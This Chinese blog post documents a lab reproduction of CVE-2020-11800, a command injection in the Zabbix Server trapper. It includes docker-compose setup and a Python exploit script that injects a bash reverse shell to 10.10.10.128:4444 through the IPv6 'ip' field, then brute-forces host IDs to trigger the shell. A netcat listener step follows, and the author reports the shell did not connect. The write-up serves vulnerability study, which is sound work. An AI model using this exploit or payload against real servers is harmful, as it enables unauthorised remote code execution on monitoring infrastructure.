首页 > 其他分享 >CVE-2020-11800

CVE-2020-11800

时间:2024-01-12 16:49:23浏览次数:26  
标签:11800 send Server 2020 import CVE data

Zabbix Server trapper命令注入漏洞(CVE-2020-11800)

Zabbix是由Alexei Vladishev开发的一种网络监控、管理系统,基于Server-Clinet架构。在CVE-2017-2824中,其Server端trapper command功能存在一处代码执行漏洞,而修复补丁并补完善,导致可以利用IPv6进行绕过,注入任意命令。

环境搭建

执行如下命令启动一个完整的Zabbix环境,包含Web端、Server端、1个Agent和MySQL数据库:

cd zabbix/CVE-2020-11800
dokcer-compose up -d

命令执行后,执行docker-compose ps 查看容器是否全部成功启动,如果没有,可以尝试重新执行docker-compose up -d。
利用该漏洞,需要你服务端开启了自动注册功能。

漏洞复现

  1. 使用脚本反弹shell,python3 zabbix.py 10.10.10.10
import sys
import socket
import json
import sys


def send(ip, data):
    conn = socket.create_connection((ip, 10051), 10)
    conn.send(json.dumps(data).encode())
    data = conn.recv(2048)
    conn.close()
    return data


target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;/bin/bash -i >& /dev/tcp/10.10.10.128/4444 0>&1"}))
for i in range(10000, 10500):
    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
    if data and b'failed' not in data:
        print('hostid: %d' % i)
        print(data)
  1. nc连接shell
nv -lvnp 4444
  1. 反弹失败,不知道什么原因

标签:11800,send,Server,2020,import,CVE,data
From: https://www.cnblogs.com/kalixcn/p/17961047

相关文章

  • NGINX文件名漏洞(CVE-2013-4547)
    影响版本Nignx0.8.41~1.4.3/1.5.0~1.5.7漏洞原因由于nginx的版本原因+运维人的问题导致,其实和低版本nginx漏洞问题差不大多,也属于nginx解析漏洞的一种复现nginx版本上传文件-给文件名添加空格和php代码直接访问图片-失败恶意访问-成功修改请求找到两个空格(......
  • [EFI]华为 Matebook D14 2020 电脑 Hackintosh 黑苹果efi引导文件
    硬件型号驱动情况主板MatebookD142020处理器 i7-10510U已驱动内存16GBLPDDR32133MHZ已驱动硬盘WDCPCSN73(不支持三星pm981/a)已驱动显卡NVIDIAGeForceMX250/Intel(R)UHD显卡620已驱动声卡瑞昱RealtekALC256@英特尔HighDefinitionAudio控制器已驱动网卡无线......
  • wustctf2020_getshell
    wustctf2020_getshellret2shell在vulnerable函数中存在溢出漏洞shell函数中已经预留了后门溢出->跳转到后门函数frompwnimport*context.log_level='debug'elf=ELF('wustctf2020_getshell')io=process('wustctf2020_getshell')payload=b'A�......
  • bjdctf_2020_babyrop
    bjdctf_2020_babyrop64位泄露libcvuln的buf变量存在溢出64位函数传入的参数依次存在寄存器rdi,rsi,rdx(顺序从左到右),返回值存在rax中bamuwe@qianenzhao:~/done/bjdctf_2020_babyrop$ROPgadget--binarybjdctf_2020_babyrop--only'pop|ret'|greprdi0x000000000......
  • 【省选联考2020】树 题解
    省选题解第一发~【省选联考2020】树我和这道题还挺有缘分的。有一次看大佬的省选游记(不知道是哪一年),然后提到有一道是01trie整体加一,当时我就印象深刻,然后在oiwiki上看了一下,心想这整体加一也只能从低位到高位维护01trie啊,又不能查询最大值,有什么卵用(划掉)。这是两周前的事......
  • pr 2020 导入歌词文件暨制作含字幕的MV
    一、制作srt字幕文件获取互联网上的lrc歌词文件;将歌词文件用记事本打开,另存为UTF-8(含物料);将lrc文件转换为srt文件;可访问以下地址:https://gotranscript.com/subtitle-converter将srt文件再用记事本打开,另存为UTF-8(含物料)。二、导入srt字幕文件  将最终获得的srt字幕文......
  • Diffie-Hellman Key Agreement Protocol 安全漏洞 (CVE-2002-20001)【原理扫描】
    Diffie-HellmanKeyAgreementProtocol是一种密钥协商协议。它最初在Diffie和Hellman关于公钥密码学的开创性论文中有所描述。该密钥协商协议允许Alice和Bob交换公钥值,并根据这些值和他们自己对应的私钥的知识,安全地计算共享密钥K,从而实现进一步的安全通信。仅知道交换......
  • [EFI]联想Thinkpad X1 (2020)电脑 Hackintosh 黑苹果efi引导文件
    硬件型号驱动情况主板ThinkpadX1Carbon处理器IntelCorei5-10210U(formerlyCometLake)已驱动内存8GBDDR3(orsomethinglikethat)已驱动硬盘WDCPCSN730SDBQNTY-256G-1001已驱动显卡IntelUHD620+NvidiaGeForceMX250(屏蔽)无法驱动声卡RealtekALC285已驱动网卡Intel......
  • Nacos未授权 CVE-2021-29441
    Nacos未授权CVE-2021-29441环境搭建环境dockerfile在文末环境启动docker-composeup-d查看下当前的容器dockerps漏洞复现访问Web页面127.0.0.1:8848抓包,访问http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=2将User-Agent的值修改为Nacos-Server......
  • 软件设计期末试卷2020级
    第1页/共6页石家庄铁道大学2022年秋季学期2020级本科期末考试试卷(A)课程名称:软件设计(闭卷)任课教师:王辉考试时间:100分钟学号:姓名:班级:考试性质(学生填写):正常考试()缓考()补考()重修()提前修读()题号一二三四五六七总分满分102020201515100得分阅卷人......